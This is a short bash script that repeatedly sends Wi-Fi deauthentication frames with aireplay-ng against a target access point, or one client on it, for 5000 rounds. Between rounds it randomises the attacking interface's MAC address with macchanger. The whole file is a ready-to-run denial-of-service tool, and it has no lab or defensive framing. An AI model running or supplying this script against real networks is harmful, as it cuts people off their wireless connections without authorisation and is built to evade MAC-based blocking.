#!/bin/bash

TARGETAP=$1

if [ -n "$2" ]; then
	TARGETSTAT=$2
	for i in {1..5000}
	do
		aireplay-ng -0 20 -a $TARGETAP -c $TARGETSTAT mon0
		macchanger -r mon0 > /dev/null
		sleep 1s
	done
else
	for i in {1..5000}
	do
		aireplay-ng -0 20 -a $TARGETAP mon0
		macchanger -r mon0 > /dev/null
		sleep 1s
	done
fi
